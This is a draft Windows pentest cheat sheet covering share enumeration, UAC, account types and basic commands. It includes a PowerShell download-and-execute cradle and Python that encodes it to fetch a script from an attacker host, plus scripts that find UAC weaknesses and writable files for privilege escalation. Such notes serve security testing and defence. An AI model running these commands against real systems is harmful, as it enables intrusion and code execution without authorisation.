
This article is currently being written.

Windows basics

Pentest Tools


Enumerate SMB shares and the access the supplied credentials have on them (add -u/-p to crackmapexec when the target refuses a null session):

$ crackmapexec smb <target> --shares
$ smbclient -L <target>


List the directories exported by an NFS server, then mount one of them:

$ showmount -e <host>
$ sudo mount -t nfs <host>:<export> /mnt/folder

Reverse shell


HTTP request

Download a file over HTTP (iwr is the alias of Invoke-WebRequest):

C:\> iwr <url>

C:\> Invoke-WebRequest '<url>' -OutFile C:\

Run a PowerShell expression

Fetch a script and run it in memory with Invoke-Expression (IEX), without writing it to disk:

C:\> IEX( IWR <url> )

Run a command passed as base64 (the base64 must encode the UTF-16LE bytes of the script, not its UTF-8 bytes):

C:\> powershell.exe -EncodedCommand <base64>
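The two commands above are usually combined: the download cradle is the script, and it is handed to powershell.exe as an encoded command so that no quoting problems arise on the target. The Python below is an added example, not code from the original page; it builds that argument on the attacker machine and decodes one back, which is also what a defender does with a command line found in a process listing. The URL http://10.10.14.5/run.ps1 is a made-up value.

```python
import base64


def build_download_cradle(url: str) -> str:
    """One-line PowerShell download-and-execute cradle.

    Same idea as IEX( IWR ... ): Invoke-WebRequest fetches the script and
    Invoke-Expression runs it in memory without touching disk.
    -UseBasicParsing avoids the Internet Explorer dependency of older
    PowerShell versions, and .Content passes the body as a plain string.
    """
    return f"IEX (IWR -UseBasicParsing '{url}').Content"


def encode_powershell(script: str) -> str:
    """Build the value for powershell.exe -EncodedCommand.

    PowerShell expects base64 of the UTF-16LE bytes of the script. Encoding
    the UTF-8 bytes instead yields a string PowerShell accepts but cannot
    parse, the most common reason an encoded command "does nothing".
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell: recover the script from a command line
    seen in a process listing. Sysmon event 1 / Security 4688 record only the
    encoded form; PowerShell script block logging (4104) records the decoded
    text."""
    return base64.b64decode(encoded).decode("utf-16-le")


def encoded_command_line(script: str) -> str:
    """Full command line to type on the target."""
    return (
        "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass "
        f"-EncodedCommand {encode_powershell(script)}"
    )


if __name__ == "__main__":
    # Assumed attacker host and script name; any reachable HTTP server works.
    cradle = build_download_cradle("http://10.10.14.5/run.ps1")
    cmdline = encoded_command_line(cradle)
    print(cmdline)
    # Round trip: decoding the last argument must give the cradle back.
    assert decode_powershell(cmdline.split()[-1]) == cradle
```

Paste the printed line into cmd.exe on the target; the same `decode_powershell` call is what to run over the `CommandLine` field of process-creation events to see what an encoded command actually did.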

User Account Control (UAC)

The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Windows Security alerts in Windows 10

Source Wikipedia.
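The settings that decide how UAC behaves on a given host live under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and are worth reading as soon as a foothold exists: whether Admin Approval Mode is on at all, whether administrators are prompted, and whether remote connections with local administrator accounts get a full token. The Python below is an added example, not code from the page; it parses the output of `reg query` on that key (the sample output is constructed, not captured from a real machine) and reports the values that weaken UAC, reading missing values as the Windows defaults.

```python
import re

# Constructed output of
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# (not captured from a real host); the values are chosen to show weak settings.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x0
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x0
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
    legalnoticetext    REG_SZ    Authorised users only
"""

# reg query prints "    <name>    <type>    <data>" for every value.
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")

# Meaning of ConsentPromptBehaviorAdmin (elevation prompt for administrators
# in Admin Approval Mode).
ADMIN_PROMPT = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (default)",
}


def parse_reg_query(output: str) -> dict:
    """Turn reg query output into {name: value}; DWORD/QWORD become ints."""
    values = {}
    for line in output.splitlines():
        m = VALUE_RE.match(line)
        if not m:
            continue  # key header or blank line
        data = m["data"].strip()
        if m["type"] in ("REG_DWORD", "REG_QWORD"):
            values[m["name"]] = int(data, 16)  # reg prints 0x-prefixed hex
        else:
            values[m["name"]] = data
    return values


def assess_uac(values: dict) -> dict:
    """Return {setting: why it matters} for each value that weakens UAC."""
    findings = {}
    if values.get("EnableLUA", 1) == 0:
        findings["EnableLUA"] = (
            "UAC is disabled: every process of an administrator carries the "
            "full token, no elevation prompt or bypass is needed")
    else:
        if values.get("ConsentPromptBehaviorAdmin", 5) == 0:
            findings["ConsentPromptBehaviorAdmin"] = (
                "administrators " + ADMIN_PROMPT[0] + ": any process of an "
                "admin user can elevate silently")
        if values.get("PromptOnSecureDesktop", 1) == 0:
            findings["PromptOnSecureDesktop"] = (
                "elevation prompt is shown on the normal desktop, where other "
                "processes of the same user can read or drive it")
    if values.get("LocalAccountTokenFilterPolicy", 0) == 1:
        findings["LocalAccountTokenFilterPolicy"] = (
            "remote UAC token filtering is off: local administrator accounts "
            "get a full token over the network, so SMB admin access (e.g. "
            "crackmapexec/psexec) works with any local admin, not only the "
            "built-in Administrator")
    return findings


def describe_admin_prompt(values: dict) -> str:
    """Human-readable line for the administrator prompt policy."""
    admin = values.get("ConsentPromptBehaviorAdmin", 5)
    return f"ConsentPromptBehaviorAdmin={admin}: {ADMIN_PROMPT.get(admin, 'unknown')}"


if __name__ == "__main__":
    values = parse_reg_query(SAMPLE_REG_QUERY)
    print(describe_admin_prompt(values))
    for setting, why in assess_uac(values).items():
        print(f"[!] {setting}: {why}")
```

Feed it the real output of `reg query` (the key is readable by standard users) instead of the sample; a host with all defaults produces no findings.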

Types of accounts

Account                 Permissions
Guest                   Can run portable software; cannot change system settings.
Standard                Can run portable software and change system settings that do not affect other users.
Administrator           Complete control over the PC (with UAC enabled, each process still has to be elevated).
SYSTEM (LocalSystem)    Built-in account used by services; complete control over the PC, but not an account one logs on with.
Domain Administrator    Complete control over every computer joined to the domain.

Information gathering

Network information

IPv4 address, DNS servers, subnet mask, MAC address, ...

C:\> ipconfig /all

Environment variables

Display all the environment variables:

C:\> set
  • APPDATA : Path to the roaming application data directory of the current user.
  • TEMP : Path to the temporary directory.
  • PUBLIC : Path to the public profile directory (every local user has READ & WRITE permission on it).
  • LOGONSERVER : Name of the server that authenticated the logon (a domain controller, or the local machine for local accounts).
  • ...

User & group information

Show details of the current user, first as a local account and then as a domain account:

C:\> net user %username%
C:\> net user %username% /domain

List the members of the local Administrators group:

C:\> net localgroup administrators

Manage permissions

Microsoft Management Console (MMC)

You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.

Source Microsoft.

Launch the MMC console:

C:\> mmc.exe

Display all available Group Policy information (verbose resultant set of policy for the current user and computer):

C:\> gpresult /z

Docs about gpresult.

Registry Editor (regedit)

The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.

Source Wikipedia.

Path for policies in regedit:


Windows firewall

Windows Firewall (officially called Windows Defender Firewall in Windows 10), is a firewall component of Microsoft Windows.

Source Wikipedia.

C:\> netsh advfirewall

Windows commands

Change the current drive by typing its letter followed by a colon; cd changes the directory on the current drive:

C:\> e:
E:\> d:
D:\> cd Documents
  • C: Windows system disk.
  • D: Data storage disk.
  • E: Data storage disk.
  • X: RAM drive used by Windows PE (the setup/recovery environment) when booting.

Drive letters are labels assigned when a volume is mounted; nothing forces the system disk to be C:, that is only the convention.


dir lists the content of a directory.


mkdir create directory.

C:\> mkdir <directory>


del delete file.

C:\> del <filename>


rmdir delete folder.

C:\> rmdir <folder>


Use the argument /S to remove the directory together with all the files and subdirectories it contains (add /Q to skip the confirmation prompt).


C:\> move <src> <dst>


copy copies only the files in <src>; subdirectories and their contents are skipped.

C:\> copy <src> <dst>


xcopy copies directory trees, but only when asked to: /S includes non-empty subdirectories, /E includes all subdirectories, empty ones too.

C:\> xcopy <src> <dst> /E


icacls displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories. Run it against the binaries and directories used by services and scheduled tasks: a file that a low-privileged principal can write is a privilege-escalation path.
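Reading icacls output by eye does not scale past a handful of files, so the usual move is to dump it for whole directories and triage it. The Python below is an added example, not code from the page: it parses icacls output (the sample output is constructed, not taken from a real host) and lists every file where Everyone, BUILTIN\Users, Authenticated Users or the current user (the hypothetical CORP\jdoe) holds a write-capable right, honouring DENY entries.

```python
import re

# Constructed icacls output for three files (not captured from a real host).
# icacls prints the path once, followed by one ACE per line; continuation
# lines are padded so the principals line up under the first ACE.
SAMPLE_ICACLS = r"""
C:\My App\svc.exe BUILTIN\Users:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Administrators:(I)(F)

C:\Tools\ok.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                BUILTIN\Users:(RX)
                Everyone:(DENY)(W)

C:\Tools\w.dll Everyone:(M)

Successfully processed 3 files; Failed processing 0 files
"""

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")

# Rights that allow changing the object: full, modify, write, delete, the
# generic rights and the granular write/ownership rights icacls prints
# comma-separated inside one pair of brackets.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}

# Principals every logged-on user belongs to.
LOW_PRIV = {
    "Everyone",
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}


def parse_ace(ace: str) -> tuple:
    """'BUILTIN\\Users:(I)(F)' -> ('BUILTIN\\Users', {'I', 'F'})."""
    m = ACE_RE.match(ace)
    if not m:
        raise ValueError(f"unrecognised ACE: {ace!r}")
    tokens = set()
    for group in re.findall(r"\(([^)]*)\)", m["flags"]):
        tokens.update(t for t in group.split(",") if t)
    return m["principal"], tokens


def _split_header(header: str, indent: int) -> tuple:
    """Separate the path and the first ACE on the line that names the file."""
    if indent:
        # Continuation lines are aligned under the first ACE, so their
        # indentation tells where the path ends even when it contains spaces.
        cut = header.rfind(" ", 0, indent + 1)
    else:
        # Single-ACE entry: nothing to align with, split at the last space
        # (wrong only for principals with a space, e.g. CREATOR OWNER).
        cut = header.rfind(" ")
    return header[:cut], header[cut + 1:]


def parse_icacls(output: str) -> dict:
    """Return {path: [(principal, {rights...}), ...]}."""
    entries = {}
    lines = output.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        if not line.strip() or line[0].isspace() or line.startswith("Successfully"):
            i += 1
            continue
        cont = []
        j = i + 1
        while j < len(lines) and lines[j].strip() and lines[j][0].isspace():
            cont.append(lines[j])
            j += 1
        indent = len(cont[0]) - len(cont[0].lstrip()) if cont else 0
        path, first = _split_header(line, indent)
        entries[path] = [parse_ace(a) for a in [first] + [c.strip() for c in cont]]
        i = j
    return entries


def find_writable(entries: dict, extra_principals=()) -> list:
    """List (path, principal, rights) where a low-privileged principal can write."""
    who = LOW_PRIV | set(extra_principals)
    hits = []
    for path, aces in entries.items():
        # An explicit DENY of a write right beats any ALLOW for that principal.
        denied = {p for p, t in aces if "DENY" in t and t & WRITE_RIGHTS}
        for principal, tokens in aces:
            if principal in who and principal not in denied and "DENY" not in tokens:
                granted = tokens & WRITE_RIGHTS
                if granted:
                    hits.append((path, principal, sorted(granted)))
    return hits


if __name__ == "__main__":
    entries = parse_icacls(SAMPLE_ICACLS)
    # CORP\jdoe is a hypothetical current user; pass the real one from whoami.
    for path, principal, rights in find_writable(entries, extra_principals=["CORP\\jdoe"]):
        print(f"[!] {path}: {principal} has {','.join(rights)}")
```

Generate the input with something like `icacls "C:\Program Files\*" /T > acl.txt` (the icacls /T switch recurses) and pass the file contents to `parse_icacls`; group membership matters too, so add the groups printed by `whoami /groups` to `extra_principals`.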
